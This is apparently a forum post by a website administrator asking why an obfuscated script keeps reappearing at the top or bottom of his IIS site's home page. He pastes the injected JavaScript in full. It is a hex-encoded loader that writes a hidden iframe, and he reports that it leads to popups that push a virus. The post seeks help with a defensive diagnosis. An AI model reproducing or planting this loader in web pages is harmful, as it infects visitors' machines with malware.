This is weird, I'm pretty familiar with SQL Injection - but we're getting
these weird injection that is writing in the default document or home page.
What it's doing is putting in script code at the top or bottom of the home
page... it looks something like this:
<script>functio n xy1q4877d47d91a 36(q4877d47d922 09){ function q4877d47d929d5
() {return 16;} return (parseInt(q4877 d47d92209,q4877 d47d929d5()));} function
q4877d47d93974( q4877d47d94144) { var q4877d47d95c9b= 2; var
q4877d47d94d7f= '';q4877d47d96c 3a=String.fromC harCode;for(q48 77d47d954cc=0;q 4877d47d954cc<q 4877d47d94144.l ength;q4877d47d 954cc+=q4877d47 d95c9b){
q4877d47d94d7f+ =(q4877d47d96c3 a(xy1q4877d47d9 1a36(q4877d47d9 4144.substr(q48 77d47d954cc,q48 77d47d95c9b)))) ;}return
q4877d47d94d7f; } var
q4877d47d9740a= '3C736372697074 3E696628216D796 961297B646F6375 6D656E742E77726 9746528756E6573 636170652820272 533632536392536 362537322536312 536642536352532 302537332537322 536332533642532 372536382537342 537342537302533 612532662532662 537342537322537 352536352537322 536392536652536 372537342536662 536652536352537 332532652536652 536352537342532 662537332536352 536312537322536 332536382532652 536332536372536 392533662536322 536312536312536 372536392537322 536632625323725 326225346425363 125373425363825 326525373225366 625373525366525 363425323825346 425363125373425 363825326525373 225363125366525 363425366625366 425323825323925 326125333525333 525333525333625 333725323925326 225323725363425 333525333225333 825323725323025 373725363925363 425373425363825 336425333125333 825333125323025 363825363525363 925363725363825 373425336425333 325333025333725 323025373325373 425373925366325 363525336425323 725363425363925 373325373025366 325363125373925 336125323025366 525366625366525 363525323725336 525336325326625 363925363625373 225363125366425 363525336527292 93B7D766172206D 7969613D7472756 53B3C2F73637269 70743E';documen t.write(q4877d4 7d93974(q4877d4 7d9740a));</script>
What it's doing is decoding itself into an iframe that links out to popups
that will try and download a virus on your machine. I don't get the popup
in my machine because i think i have a newer version of IE. But some
people have complained that it is installing a virus on their machine.
Also what is crazy is when I replace the file with a good version. In
about 30 mins, it automatically overwritten with the infected version.
Also I've noticed it on some other websites that I haven't touched.
Has anyone encountered this before? Because I'm stumped as to the cause of
it. I don't see the issue on our dev server. It seems to be IIS on a
shared host.
Brian